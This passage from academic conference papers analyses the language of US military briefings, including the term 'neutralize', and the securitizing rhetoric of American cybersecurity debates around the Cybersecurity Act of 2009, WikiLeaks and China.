Cascading network failure Dislocate Negate
Control Disrupt Neutralize
Coordination failure Distract Operational failure
Create information vacuum Divert Paralysis
Decapitate Exploit Penetrate
Decision paralysis Expose Prevent
Defeat Halt Protect
Degrade Harass Read
Delay Influence Safeguard
Deny Inform Shape
Destroy Interrupted Shock
Desynchronize Lose confidence in information Stimulate
Deter Lose confidence in network Stop
Manipulate
Actions/Effects are understood as either tactical-operational or strategic according to their communicative
function. An Action description may have multiple readings, depending on its context. These two
categories are discussed in the following chapter.
4.1 Tactical-operational Action descriptions
During a war or a military operation, there is a number of actions the participating forces may carry out.
These actions may be referred to with action decriptions such as defend, attack, penetrate, target, control
or destroy. In this paper, this type of descriptions are referred to as the tactical-operational level of
communication. The function of this level of communication is to verbalize the actions in different theaters
of war. The terms are concrete and applicable to both 'self' and the enemy.
This is not to say that tactical-operational Action descriptions are free of evaluation. When tacticaloperational
Action descriptions are applied to 'self', the purpose is often to demonstrate force and
capacity. In turn, descriptions of the enemy defending are typically few. The terms clearly denote different
levels of modality and appraisal. Defend has a lower modality than attack, and it is also more positive
than negative: Defence is always a legitimate action, whereas attacking signals greater use of force,
either legitimate or illegitimate. The tactical-operational level engages the parameters of legitimity and
positivity/negativity.
The war in Iraq has been going for roughly one week. Good progress has been made. The
coalition forces have control of the air. They have moved from the Iraq border in the south to
within 50 miles of Baghdad. We have forces in the south, in the west, in the north. The socalled
Republican Guard forces are ringing Baghdad some 40-50 miles away from it, and
very likely that will be some of the toughest fighting that will occur and that's yet ahead of us.
(Department of Defense, 2003a)
This can be understood as a description of an advancing military operation, although the text may have a
rhetorical reading. Coalition forces are described as in control and their actions successful. However,
these descriptions are 'traditional' military vocabulary and can be analyzed as positive or negative,
legitimate or illegitimate, and of low or high modality.
During the first days of the war in Iraq, Secretary of Defense Donald Rumsfeld (Department of Defense,
2003b) described the enemy as follows:
They took one person last week and cut his tongue out and left him to bleed to death in the
public square. This is a vicious, vicious regime. If he tells one of his henchmen to go out and
say that, and tells him precisely what to say, he either says it or he's shot.
The regime has committed acts of treachery on the battlefield dressing their forces as
liberated civilians, and sending soldiers out waving white flags and feigning surrender, with
the goal of drawing coalition forces into the ambushes; using Red Cross vehicles to courier
military instructions. These are serious violations of the laws of war. The regime's actions
158

Saara Jantunen
have had little practical military effect thus far, but they do serve as a telling reminder of why
it is important that this regime be removed.
These are examples of classic demonization. What is noteworthy is that the enemy is not described with
the Action descriptions of the tactical-operational level. They do not attack or even destroy, but 'cut out
tongues' and 'commit acts of treachery'. By not describing the enemy actions with descriptions of military
action, the enemy is denied the status of a real military force, and associated with criminals and terrorists.
To summarize, tactical-operational Action descriptions have two main uses: They may aim for neutral
communication, but often demonizing is done not by applying high-modality Action descriptions, not even
the kind that denote illegitimate action, to discuss the enemy action. Demonizing is done by reserving
tactical-operational lexicon only for describing 'us'. However, there is a strategic level of communication,
which contains descriptions of legitimate military action that are never applied to both 'self' and the
enemy. This level will be discussed next.
4.2 Strategic Action descriptions
When Action descriptions become more abstract and less applicable to the enemy, there is also a shift
from the tactical-operational level to the strategic level. Terms such as liberate and stabilize are
examples of strategic level 'rhetorization', where ambiguosity increases and the Action descriptions are
superordinate terms that can be understood in several ways. Strategic level typically contains Action
descriptions that are applicable to 'us' or 'them' only:
This war is an act of self defense, to be sure, but it is also an act of humanity. Coalition
forces are eliminating a regime that is responsible for the deaths of hundreds of thousands
of its own people and which is pursuing weapons that would enable it to kill hundreds of
thousands more. (Department of Defense, 2003c)
While the enemy is described with lexicon that is more applicable to criminals than the military, the 'self' is
glorified in several ways: In Iraq, the coalition forces were doing self defence (a word choice to denote
legitimity) and eliminating a killer regime. Of course, in March 2003 self defence (lower modality) was
carried out by series of attacks (higher modality) and eliminating by whatever the means necessary to
inflict enemy casualties. Both self defence and eliminate are more abstract and ambiguous than the given
alternatives, and rarely, if at all, associated with enemy action.
What both the tactical-operational and the strategic level descriptions have in common is that they are
usually clearly positive or negative and it is possible to determine their level of modality compared to
other Action descriptions. 'Self' is rarely associated with the negatively evaluated Action descriptions,
unless there is a good rhetorical reason. 'Self' is described as resourceless and weak in cyber discourse
(see Cybersecurity Act of 2009) as part of threat discourse, in order to securitize the internet.
In short, strategic motives behind discourse are recognizable from either strong evaluation or exclusion.
Of all descriptions of Action or Affects, the term neutralize is perhaps the best example of strategic level
usage.
4.3 The semantic puzzle of the term 'neutralize'
When the war on Iraq started in March 2003, the Pentagon was quick to comment on their strategy and
doctrine. Colonel Crowder, (Chief, Strategy, Concepts and Doctrine) elaborated on the concept of Effects
Based Operations (EBO):
Let me talk a little bit about how we do this. Everything -- first of all, there's not a target that
we would strike that is not specifically struck to achieve a desired effect. And so we look at
that target and we say, what do we want to do to that target? I want to neutralize or I want to
destroy this bunker. And then I examine what munitions I might use to destroy that bunker.
Ideally, if you could turn the lights off and make everybody go to sleep, that would be really
nice. Unfortunately, some of our capabilities are not quite that advanced, and in many cases,
we have to resort to physical destruction.
Here the Action descriptions neutralize and destroy are used contrastively. The US Department of
Defence defines the terms neuralization and neutralize as follows (DOD Dictionary):
159

Saara Jantunen
neutralization — (*) In mine warfare, a mine is said to be neutralized when it has been
rendered, by external means, incapable of firing on passage of a target, although it may
remain dangerous to handle.
neutralize — 1. As pertains to military operations, to render ineffective or unusable. 2. To
render enemy personnel or material incapable of interfering with a particular operation.
These definitions emphasize that neutralizing is an action that lessens the target or object of action,
makes it less (or not) capable of operating, and so removes the threat it poses. During the Iraqi war the
term has been associated with the following objects:
Table 2: Configurations with the Process 'neutralize'
Action Object Year and source
neutralize adversary forces (Emmet, 1996)
neutralize electrical power (Department of Defense, 2003c)
neutralise anti-Iraqi forces Department of Defense, 2006a)
neutralize the enemy (Department of Defense, 2006b)
neutralise the threat (Department of Defense, 2006c)
neutralize bottom and moored mines (Department of Defense, 2010b)
Here, neutralize carries a variety of meanings, from making ineffective or non-existent to destroying and
killing. The practical use differs from the definition of the word.
In Taylor's (2007) categorization, neutralize is an Effect, categorized as a "long-term desired effect". It is
listed along with terms that could be categorized as tactical-operational Action descriptions, such as
decapitate, defeat, or stop. However, it is different than most Action (or Effect) descriptions:
'Neutralize' operates on both tactical-operational and strategic level:
As the above chart demonstrates, neutralize is a term that can be used to describe both concrete,
tactical-operational Actions, such as neutralizing mines or the enemy, and strategic Actions, such as
neutralizing insurgency or a threat. The latter is much like the use of the term stabilize - an abstract
subordinate term. These Action descriptions may refer to a variety of actions, and in fact, these terms
could be used synonymously. One may argue that both neutralizing and stabilizing could be achieved by
the use of weapons, through education, development aid, or an embargo. The terms are ambiguous and
multi-layered, which means they may be given several meanings. The fact that a term may operate on
both concrete and abstract level adds to its ambiguousity: neutralizing may be the result of an information
operation or the use of kinetic weapons.
Certain terms are exclusive in their use:
As discussed earlier in this chapter, military discourse has a set of vocabulary for discussing 'self' and the
enemy. Some of this vocabulary apply to both groups (attack, defend, operate, control). Demonising is
always negative and always refers to the enemy, whereas glorifying is positive and refers to 'self'.
Neutralize is a term that is, quite literally, neutral. It is very difficult to place it on the positive/negative or
legitimacy parameters. However, it is one of the most used 'effect descriptions' of warfare based on
system thinking. It is a term that is reserved for describing 'our' actions only - never the enemy. This
means that there is a third parameter: the inclusive/exclusive parameter that creates the distance
between 'self' and the enemy without obvious evaluation.
Because neutralize is exclusive in its use, it means the term is not tactical-operational nor value-free. The
fact that its original definition and its practical usage differ from each other tells about rhetorization:
speakers must have a reason why they use a term to describe an Action of a higher modality than Action
description used.
To summarize, the following figure demonstrates the parameter system when analyzing descriptions of
Actions and Effects:
160

Figure 1: Parameter system
Saara Jantunen
The concept of war has become ambiguous and war distant. As a term, neutralize symbolizes this
ambiguity and distance. Neutralizing is a tactic and strategy of Effects Based Operations and the
Comprehensive Approach, science and advancement, and it communicates the binary ideology of
science in the service of virtue on one hand, and dominance through destruction on the other. As a
subordinate term, it covers a whole range of use of force without. As a n Effect description, it symbolizes
strategic communication in the linguistic tradition of the RMA.
5. Conclusion
Whether sterile or hostile, behind strategic communication there is an ideology of technological seclusion.
This contradicts the views of Generals Petraeus and McChrystal, who argue for communicating and
networking with the Afghan population. However, communication directed at the American public remains
involved with narratives of the morally corrupt enemy and the omnipotence of technology. Even though
people are now recognized as the center of gravity in warfare instead of weapons and technology,
current military discourse still emphasizes deterrence and the role of technology. This is the result of the
complex ties between the military industry and government. At the same time, the 'battle of narratives'
pushes communication towards descriptions of 'soft power' and binary rhetoric.
The technology-centered perception of warfighting is resulting in discourse that increasingly describes
Action as something enabled by and executed through technology. The paradox is in the representation:
the words do not match the reality they refer to, or have no concrete representation in the physical world.
Neutralize is an example of this. Abstract war requires abstract concepts to verbalize it.
References
Emmet, P. (1996) 'Six Emerging Trends in Information Management', Defense Issues: Volume 11, Number 16.
[Online] Available: http://www.defense.gov/Speeches/Speech.aspx?SpeechID=885 [30 Jan 2011]
Foucault, M. (2010) Sanat ja asiat. Eräiden ihmistieteiden arkeologia. Helsinki: Gaudeamus
Halliday, M.A.C. (2004) An Introduction to Functional Grammar. Revised by Matthiessen, C.M.I.M, London: Arnold.
Lukin, A. (2005) 'Information warfare: The grammar of talking war', Social Alternatives Vol. 24 No. 1, First Quarter,
pp. 5-10.
McLeroy, C. (2008) 'Army Experience Center opens in Philadelphia', Army News Service, 29 Aug [Online] Available:
http://www.army.mil/-news/2008/09/02/12072-army-experience-center-opens-in-philadelphia/ [30 Jan 2011]
Pang, F. (1997) Quality of Life: A Military Preparedness Priority, Defense Issues, volume 12, number 36 [Online]
Available: http://www.defense.gov/speeches/speech.aspx?speechid=765 [30 Jan 2011]
Rantapelkonen, J. (2006) The Narrative Leadership of War: Presidential Phrases in the 'War on Terror' and their
Relation to Information Technology. Doctoral Dissertation. Publication Series 1, Research n:o 34, Helsinki:
National Defence University.
161

Saara Jantunen
Raytheon (2010) 'Time Magazine Names the XOS 2 Exoskeleton "Most Awesomest" Invention of 2010', [Online]
Available: http://www.raytheon.com/newsroom/technology/rtn08_exoskeleton/ [30 Jan 2011]
Simon, G. & Duzenli, M. (2009) 'The comprehensive planning directive', NRDC-ITA Magazine, Issue nr. 14, [Online]
Available: http://www.nato.int/nrdc-it/magazine/2009/0914/0914g.pdf [Jan 30 2011]
Taylor, P. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day, 3rd
edition, Manchester: Manchester University Press.
The Cybersecurity Act of 2009 (S 773 IS) (2009) Act. [Online] Available: http://frwebgate.access.gpo.gov/cgibin/getdoc.cgi?dbname=111_cong_bills&docid=f:s773rs.txt.pdf
[30 Jan 2011]
United States Joint Forces Command. (2010) The Joint Operating Environment 2010, [Online] Available:
http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].
United States Joint Forces Command (2010) The Joint Operating Environment 2010 [Online], Available:
http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].
US Cyber Challenge (2010) USCC, [online] Available: http://www.uscyberchallenge.org/ [2 Jan 2011]
US Department of Defense (2003a) DoD News Briefing - ASD PA Clarke and Maj. Gen. McChrystal, Transcript, 29
March, [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=2182 [30 Jan 2011]
US Department of Defense (2003b) DoD News Briefing - Secretary Rumsfeld and Gen. Myers, Transcript, March 25,
[Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=2141 [30 Jan 2011]
US Department of Defense (2003c) Effects Based Operations Briefing, Transcript, 19 March, [Online] Available:
http://www.defense.gov/Transcripts/Transcript.aspx?TranscriptID=2067 [30 Jan 2011]
US Department of Defense (2005) Defense Department Special Briefing on Security Operations in Baghdad,
Transcript, 15 July [Online] Available: http://://www.defense.gov/transcripts/transcript.aspx?transcriptid=3179
[30 Jan 2011]
US Department of Defense (2006a) DoD News Briefing with Col Snow from Iraq, Transcript, 30 June, [Online]
Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=18 [ 30 Jan 2011]
US Department of Defense (2006b) DoD News Briefing with Maj. Gen. Thomas B. Turner II from Iraq, Transcript, 8
Sep [Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=3716
US Department of Defense (2006c ) DoD News Briefing with Maj. Gen. Thomas B. Turner II from Iraq, Transcript, 6
Sep, [Online] Available: http://www.defense.gov/speeches/speech.aspx?speechid=1136 [30 Jan 2011]
U.S. Department of Defense (2008) 2008 National Defense Strategy, [Online], Available:
http://www.defense.gov/news/2008%20national%20defense%20strategy.pdf [30 Jan 2010]
US Department of Defense (2010a) DOD News Briefing with Secretary Gates and Adm. Mullen from the Pentagon
[Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=4728 [30 Jan 2011]
US Department of Defense (2010b) Contracts Air Force No. 868-10, 23 Sep, [Online] Available:
http://www.defense.gov/contracts/contract.aspx?contractid=4373 [30 Jan 2011]
Virilio, P. (2009) The Aesthetics of Disappearance, Translated by Philip Beitchman, Los Angeles: Semiotext(e).
162

A Case-Study on American Perspectives on Cyber and
Security
Saara Jantunen and Aki-Mauri Huhtinen
National Defence University, Finland
sijantunen@gmail.com
aki.huhtinen@mil.fi
Abstract: In 2009, the Cybersecurity Act of 2009 was introduced to U.S. Congress while the media were reporting
about China's role in the Ghostnet-network. In 2010, WikiLeaks and selected newspapers published confidential
documents, stirring up a cybersecurity debate. This article discusses these narratives in the context of securitization.
The methodology consists of linguistic theory, namely the systemic functional language theory, and the securitization
theory of the Copenhagen School. The analysis realizes as examination of the structures and evaluations of the
action descriptions referring to the threat. As a result we can see that cyber discourse is a synonym to threat
discourse. The agenda of cyber discourse is not purely about security, but is a reflection of the battle over cyber
authority and the question of its status as a battle space.
Keywords: cyber, securitization, strategic communication, linguistics
1. Introduction
At the moment of writing this article, the debate on cybersecurity is more aggressive than ever. This
article aims to provide a method for approaching threat discourses, using the concept of cybersecurity as
an example. Not ignoring the themes of the debate, this article aims to contribute to the methods of
analyzing security discourse and the linguistic structures of securitization.
Before discussing the linguistic properties of the cybersecurity debate, it is reasonable to discuss the past
narratives linked to the topic.
After his inauguration, President Obama appointed Melissa Hathaway the Acting Senior Director for
Cyberspace for the National Security and Homeland Security Councils. She led the so-called 60-day
cybersecurity review project, which resulted in Cyberspace Policy Review. At the same time, the
Cybersecurity Act of 2009 was introduced by senators Rockefeller and Snowe. This Act will be discussed
more in detail in the following chapters. However, it is not the only document concerned with
cybersecurity issues. Papers such as Snooping Dragon and Ghostnet as well as several government
white papers kept China and China's alleged cyber warfare aspirations in the headlines. In 2010 another
cyber scandal emerged, when WikiLeaks started to publish leaked documents.
2. Cyber discourse in the 20th century
In 1990, National Academy of Sciences released a report, starting with the following phrases (Bendrath,
2004):
We are at risk. Increasingly, America depends on
computers… Tomorrow’s terrorists may be able to do
more damage with a keyboard than with a bomb.
The opening phrase of Cybersecurity Act 2009 sounds rhetorically very similar:
The congress finds the following: America’s failure to
protect cyberspace is one of the most urgent national
security problems facing the country.
And not only this. The hypothetical cyber attack is compared to of 9/11, the biggest American trauma
since Pearl Harbor:
[I]f the 9/11 attackers had chosen computers instead of air planes as their weapons and had
waged a massive assault on a U.S. bank, the economic consequences would have been ‘‘an
163

Saara Jantunen and Aki-Mauri Huhtinen
order of magnitude greater’’ than those cased by the physical attack on the World Trade
Center.
These quotes are almost 20 years apart, but the rhetoric remains the same. Cyberspace is a threat, and
it will replace traditional warfare and be just as lethal, if not more lethal, than kinetic weapons. On the
other hand, state adversaries exist side by side with cyber terrorism in the cyber rhetoric of the 21st
century. According to Bendrath, the word 'cyber' has often more to do with rhetoric and hidden agendas
than with actual threats (2004).
Bendrath (ibid.) states that media, government officials and intelligence agencies create a circle, where
they think up worst-case scenarios. The same phenomenon was obvious in 2009. Rhetorical statements
may land in bills and Acts, as was the case with the much-quoted Securing Cyberspace for the 44th
Presidency report:
America’s failure to protect cyberspace is one of the most urgent national security problems
facing the new administration that will take office in January 2009.
The opening phrase of the first draft of the Cybersecurity Act of 2009 is not difficult to recognize:
America’s failure to protect cyberspace is one of the most urgent national security problems
facing the country.
The only difference is that instead of the administration, it is the whole country that is under a threat.
Extending the threat to the entire country brings the matter into the domain of government control.
Bendrath (2004) remarks that unlike what was the case with nuclear war during the Cold War, an
average citizen can not possibly know whether cyber war is reality or not. When Securing Cyberspace for
the 44th Presidency states that "In cyberspace, the war has begun", and that "It is a battle we are losing".
The fact is that citizens cannot tell whether attacks and hacking are reality, or whether the alleged parties
are really responsible for them (ibid.).
2.1 "Federal government bears primary responsibility"
Cybersecurity can no longer be relegated to information technology offices and chief
information officers. Nor is it primarily a problem for homeland security and counterterrorism.
And it is completely inadequate to defer national security to the private sector and the
market. This is a strategic issue on par with weapons of mass destruction and global jihad,
where the federal government bears primary responsibility.
(Securing Cyberspace for the 44thpresidency)
Cybersecurity Act of 2009 proposes public and private IT-sector cooperation and government control of
the private sector networks. The first draft of the Act also proposed the so-called "kill-switch", which
would have given the president unilateral authority to control (or shut down) access to the internet without
explanation. This created public debate. The provision was revised, and a year later the Act was
approved and passed to the Senate for consideration. However, the president would still be authorized to
"declare cyber emergency" and decide on its duration. The bill was proposed in a congress session, but
did not become law.
The message is clear. The internet should be controlled, and its control is government responsibility. In
2010, this discussion was more heated than ever, after WikiLeaks published government documents.
Politicians were quick to label Julian Assange a terrorist (James, 2010), and the Pentagon banned the
military the access to WikiLeaks (Scarborough, 2010) while the federal authorities were investigating
whether Assange could be charged under the Espionage Act. "This is worse even than a physical attack
on Americans, it’s worse than a military attack," says congressman Peter King, again repeating the
rhetoric of information as a physical weapon (James, 2010). This rhetoric is the paradox of cyber
discourse.
2.2 "Thousands of people die"
When discussing cybersecurity, the problem and question is the definition of cyber warfare. When can a
cyber operation be referred to as cyber war, and what is the difference between cyber terrorism and
164

Saara Jantunen and Aki-Mauri Huhtinen
cyber sabotage? There may not be any difference between the terms, but it is a matter of word choice
(Kuparinen, 2009). The use of the word 'terrorism' is a rhetorical choice.
In the Merriam-Webster's online dictionary terrorism is defined as
1. The calculated use of violence (or the threat of violence) against civilians in order to attain
goals that are political or religious or ideological in nature; this is done through intimidation or
coercion or instilling fear
2. The act of terrorizing, or state of being terrorized; a mode of government by terror or
intimidation.3. The practise of coercing governments to accede to political demands by
committing violence on civilian targets; any similar use of violence to achieve goals.
The discussion on the 2007 cyber attacks against Estonian targets is an example of the confusing of the
terms 'terrorism' and 'sabotage'. Are attacks against online services "calculated use of violence"?
This is a question James Lewis (CSIS) asks:
Terrorism requires violence and horror. On September 11th, for example, after a day of
shocking images, riders of Washington’s subway system could still smell smoke in the
tunnels from the burning Pentagon. In Estonia’s recent cyber incident, people were unable to
access their bank accounts online.
Lewis continues by stating that exaggerations about epic disasters is a way to bring cyber threats into the
public consciousness. However, this did not stop The Telegraph from using the headline ”Cyberterrorism
is real - ask Estonia" (30.3.2007). If the attacks against Estonian infrastructure are considered
cyber terrorism, the definition of terrorism is different in the context of cyber, or, needs to be redifined. In
order to be properly established, the term needs a clear semantic representation despite its political
nature. The political demand for threat discourse will be discussed in the following chapter.
3. Threat discourse: Methods for analysis
As the previous chapters have demonstrated, cyber rhetoric is synonymous to threat discourse. This
brings us into the domain of security analysis. This chapter focuses on bringing together two approaches,
the securitization theory and the functional language theory, which form the backbone of the analysis of
threat discourse. The following sections will briefly discuss the relevance of the securitization theory in
discourse analysis, and bring it together with functional language theory.
3.1 Securitization as discourse
From the perspective of discourse analysis, the securitization theory (Buzan, Waever & de Wilde, 1998)
has three key concepts: the securitizing actor, the securitizing move, and the referent object. "A
securitizing actor is someone, a group, who performs the security speech act" (Ibid: 40). The securitizing
move is a "discourse that takes the form of presenting something as an existential threat" (Ibid: 25), and
the referent object is the object existentially threatened and has, at the same time, the "a legitimate claim
to survival" (Ibid: 36). The threats are verbalized through speech acts - threat discourse.
These three elements are the pivotal structures of discourse discourse - which, ironically, typically is
realized as threat discourse. The result of successful securitizing moves is securitization, which removes
the referent object from the domain of politics and transfers it into "panic politics". This polarizes the
concepts of politicization and securitization (Ibid: 29). If the process of securitization is not successful, the
act should be understood as a securitizing move (Ibid). All this actualizes through language and
discourse. The structural properties of argumentation support the semantics of the debate.
3.2 What does functional language theory have to offer?
According to functional language theory, language has three functions. They are presented below as in
Butt (2003):
Ideational (experiential and logical metafunctions)
Interpersonal
Textual
165

Saara Jantunen and Aki-Mauri Huhtinen
In this study the ideational function is the foundation of the analysis, as it deals with the conceptualizing
process of language by focusing on the natural world and events, inluding the human consciousness and
language. This function contains the experiential and logical metafunctions. The logical metafunction
uses our experiences to organize reasoning. The experiential metafunction is realized by the transitivity
system, and it deals with our experience and understanding of the world: "It conveys a picture of reality",
and this makes it the main tool of this analysis. The experiential function answers the question who does
what to whom under what circumstance, the Process being the core element of the question.
According to Halliday (2004: 170-172), a clause is not only a flow of action, but a mode of reflection that
imposes endless variation as well as flow of events by a system of transitivity. A clause typically consists
of the following components (Halliday, 2004: 175):
Process
Participants (involved in the Process)
Circumstance (associated with the Process)
As demonstrated above, all elements of the clause are tied to the process. The transitivity system
contains the idea that 1) a clause is a process in which 2) some things/events function as participants,
who, simply put, either do/act/happen, or are targets of doing/acting/happening. The system construes
experience into process types: material, behavioral, mental, verbal, relational and existential. These
process types are realized by verbal groups. Nominal groups represent participants, and adverbial
groups circumstance.
Table 1: Examples of clause elements
Participant Process Target Circumstance
MATERIAL They attacked us viciously.
Participant Process Attribute
RELATIONAL They are wonderful men and
women
This discussion on the role of processes (verbs) and their significance functions as an argument for the
method of analysis. The choice of process type in discourse is used to create representations of events,
objects and phenomena around us. In addition, the presence or the absence of clause elements is
perception management of sorts. We can describe things to be done or simply to happen, without any
reference to the doer ot the object of action. This is exactly what the transitivity system
Lukin (2005) demonstrates the function of the transitivity system in military discourse. She discusses the
aspect of "doing without doing to" in war rhetoric, a tactic of "muting" action.
Table 2: Examples of actor+process configurations, from Lukin, 2005: 7
Actor Process (circumstantial processes)
The operation began on the 19th of March
Our forces are operating throughout Iraq
Decisive precision shock began last night
In the above examples the omission of the target of action functions as a tool for perception
management. Leaving out clause elements, in this case the object/target of military action, creates a
narrative of 'happenings' rather than actions: "The attacks occured with effectiveness" but not We
attacked effectively. The manipulation of clause elements could be called 'grammatical tactics' in threat
discourse.
Sometimes Processes turn into Participants. This process is called nominalization. In functional grammar,
nominalizations can be understood as metaphors (Butt, 2003: 74). Through nominalization, an action
turns into a concept. The opening clause of the Cybersecurity Act of 2009 is a good example:
Nominalization: America’s failure to protect cyberspace is one of the most urgent national security
problems facing the country.
166

Saara Jantunen and Aki-Mauri Huhtinen
The nominalization can be compared to a clause with a Participant +Process configuration:
Process description: America has failed to protect cyberspace.
When Process forms into a Participant, the "event has become an object and the language is no longer
congruent with our experience" (Butt, 2003: 75).
The upcoming analysis will further analyze the evaluative patterns of the data. The action descriptions
can be categorized according to their evaluative function. Martin & White (2005) argue there are three
semantic categories for expressing attitude. These express positive or negative ways of feeling (Attitude),
our attitudes towards people and how they behave (Judgement), and our evaluations of the worth of
things and phenomena around us (Appreciation):
Table 3: Types of attitude
Attitude Affect Judgement Appreciation
Variables un/happiness, in/security,
dis/satisfaction
Social esteem: normality,
capacity, tenacity
Behavior wail, trust, condemn
Social sanction: veracity,
propriety
perform, fail, depend
deceive, abide
reaction, composition,
valuation
bore, help
Whereas the securitization theory discussed in the previous section does not provide tools for the
structural analysis of the securitizing move, the functional language theory offers a method for
determining the representation of 'self' or 'the other' in discourse. This is the key to analyzing threat
discourse. The following chapter is dedicated to two analyzes: the first analysis deals with the properties
of the securitization narrative, and the second analysis discusses the linguistic patterns and semantic
dimension of cyber discourse.
4. Analysis: Cyber, censorship and securitization
This chapter focuses on two aspects of language and discourse. First, a brief analysis of the WikiLeaks
discussion will discuss the narrative patterns of cyber/information security. This will act as an introduction
to threat/cyber discourse and provide examples of securitizing moves. After that, the structural and
evaluative properties of threat discourse are approached through the analysis of cyber discourse.
4.1 Threat discourse as a narrative: WikiLeaks in the media
WikiLeaks gained wide international publicity when it published video material leaked by someone in the
U.S. military. These videos were recorded during helicopter operations in Iraq. The one that caused most
controversy, published by WikiLeaks by the name Collateral Murder, shows the shooting of a group of
men and later civilians who stopped to help the wounded and killed, who later turned out to be journalists
and photographers. The disproportionate use of force (among other munitions, Hellfire missiles were
employed) and the arrogant and mocking comments of the crew caused public outrage. The comments
"Come on, let us shoot!" and "Oh yeah, look at those dead bastards" can be heard on the video.
WikiLeaks kept publishing controversial material, and in November 2010 it released a massive number of
diplomatic cables. WikiLeaks founder, Julian Assange, gave a number of selected journalists access to
the material. He said that the massive amount of information was too much for them to research, so
journalists, as professionals, would be the right people to research the material, remove any details that
would endanger for example civilian collaborators, and to report their analysis in the media (Wikirebels,
2010).
The publishing immediately enraged a number of politicians in the U.S. and elsewhere. Assange's
actions were quickly not only condemned, but referred to as acts of 'terror'. Secretary of State Hillary
Rodham Clinton stated that the actions of WikiLeaks "tear at the fabric" of responsible government, and
are an attack on not only America, but on international community. Tom Flanagan, a Canadian former
presidential advisor, suggested President Obama should have Assange assassinated (Collins, 2010).
Sarah Palin demanded WikiLeaks should be hunted like al-Qaeda (Beckford, 2010). Politicians were
167

Saara Jantunen and Aki-Mauri Huhtinen
quick to compare Wikileaks to terrorists: Congressman Peter King wrote to Clinton that "WikiLeaks
engaged in terrorist activity by committing acts that it knew, or reasonably should have known, would
afford material support for the commission of terrorist activity" (Pillifant, 2010).
Clinton has emphasized the roles of free information and transparency. In her speech on internet
freedom she cites President Obama (Council on Foreign Relations, 2010):
During his visit to China in November, President Obama held a town hall meeting with an
online component to highlight the importance of the internet. In response to a question that
was sent in over the internet, he defended the right of people to freely access information,
and said that the more freely information flows, the stronger societies become. He spoke
about how access to information helps citizens to hold their governments accountable,
generates new ideas, and encourages creativity. The United States' belief in that truth is
what brings me here today.
A year later, after the publishing of the diplomatic cables, Clinton's rhetoric had thus changed, but the
WikiLeaks website declared their mission is transparency (Schmitt, 2010):
All governments can benefit from increased scrutiny by the world community, as well as their
own people. We believe this scrutiny requires information.
What ever the truth behind the leaked documents, from the perspective of securitization it is the logic of
argumentation that interests us. The status of freedom of speech as an intrisic value and as the
foundation of Western culture suffered a blow. WikiLeaks, embodied by Julian Assange, was accused of
threatening national security. The initial leaker and the newspapers that published leaked material have a
minor role in the threat discourse. The press enjoys freedom of press, but the internet as a medium
clearly does not enjoy the same freedom. Information is referred to as a "bomb" (Wikirebels, 2010) when
it is online.
Obviously it is not the information that is the problem. According to Secretary of Defence Gates, the
publication of the cables was merely embarrassing (U.S. Department of Defense, 2010). It is the fact that
this information is published online that is seen as a threat.
4.2 Structures and evaluations of threat discourse: China and cyberspace
In this section, threat discourse is approached through Process analysis, meaning descriptions of action
and being. The data comes from a number of American white papers on cyber security: The
Cybersecurity Act of 2009, Securing Cyberspace for the 44th Presidency, and the 2008 report to
Congress by the China Economic and Security Review Commission.
In American cyber discourse the threat types can be divided into three categories. The most prominent
one of them is military threat. This is verbalized with enemy action descriptions as follows:
Operate through foreign nations’ military or intelligence-gathering operations
Physical threat is the other main threat type. This category contains descriptions of enemy action such as
attacking/influencing/manipulating critical infrastructure and networks that may affect people's lives and
well-being:
Disrupt telecommunications, electrical power, energy pipelines, refineries, financial networks, and
other critical infrastructures
The third main category of threat descriptions deals with the status of the U.S as a financial superpower:
Have easy access to military technology, intellectual property of leading companies, and government
data
By categorizing the Process types of enemy action descriptions, it is easy to see the narrative. According
to the reports, Chinese hackers are described as a threat to the critical infrastructure (which culminates to
the citizens in their own homes), to corporations through industrial espionage, and to the entire nation
through the looming, full scale cyber war.
The following sections will discuss the categorization of data into Process types, as well as their
evaluation types.
168

4.2.1 Enemy capacity
Saara Jantunen and Aki-Mauri Huhtinen
Descriptions of enemy capacity are the core of the data. They are high modality threat descriptions. The
following data are examples of how China's actions are described:
Table 4: Descriptions of capacity
gain access
and view
continue to
develop and
field
protected data or
cause infrastructure
components to
operate in an
irregular manner
disruptive military
technologies
have implications beyond
the Asia-Pacific
region
can engage in forms of cyber
warfare so
sophisticated
material, material Judgment: social esteem:
capacity (negative
evaluation)
material Judgment: social esteem:
capacity (negative
evaluation)
relational possessive Judgment: social esteem:
capacity (negative
material (relational
possessive)
evaluation)
Judgment: social esteem:
capacity (negative
evaluation)
can access the NIPRNet material Judgment: social esteem:
capacity (negative
evaluation)
A typical action descriptions is a material process, which aims to highlight the adversary's capability,
resources and training to wage war in cyberspace. Obviously, these are also attributes that are desirable
for every nation's military. Although there are a number of descriptions that contain moral evaluation, the
context of war normalizes them to capacity descriptions. The descriptions are evaluated as 'negative
capacity':
Table 5: Capacity vs. propriety
have been able to penetrate poorly protected U.S. computer networks material Judgment: social
esteem: capacity
(negative
evaluation)
Penetrating U.S. networks could be evaluated, depending on the context, as criminal or immoral, but the
description contains the clear message that the enemy is resourceful and skilled, and ready to use their
skills if it is militarily necessary.
4.2.2 Enemy affect
The enemy is not described with the mental process type much, but rhetorically the use of this Process
type is significant.
Table 6: Mental processes
believe the United States already is
carrying out offensive cyber
espionage and exploitation
against China
mental Affect: insecurity
believe that in many cases a
vulnerable U.S. system
could be unplugged in
anticipation of a cyber
attack.
mental Affect: security
believe the United States is
dependent on information
technology
mental Affect: security
believe there is a first mover
mental Judgment: social
advantage in both
conventional and cyber
operations against the
United States
esteem: capacity
169

Saara Jantunen and Aki-Mauri Huhtinen
Interpreting the beliefs or thinking of someone else is always a rhetorical tool. Here the context
emphasizes this fact. First, it is told that China considers cyber war as defence. Then, it is stated that
China already believes the U.S. "already is carrying out offensive cyber espionage". In other words,
China believes cyber attacks are necessary right this moment. This argument contains the only action
description that signals insecurity for China's part. The outcome is threat descourse: China feels
threatened and may attack any moment.
4.2.3 Propriety
Evaluating the propriety of the adversary may be the oldest tradition of war rhetoric and information
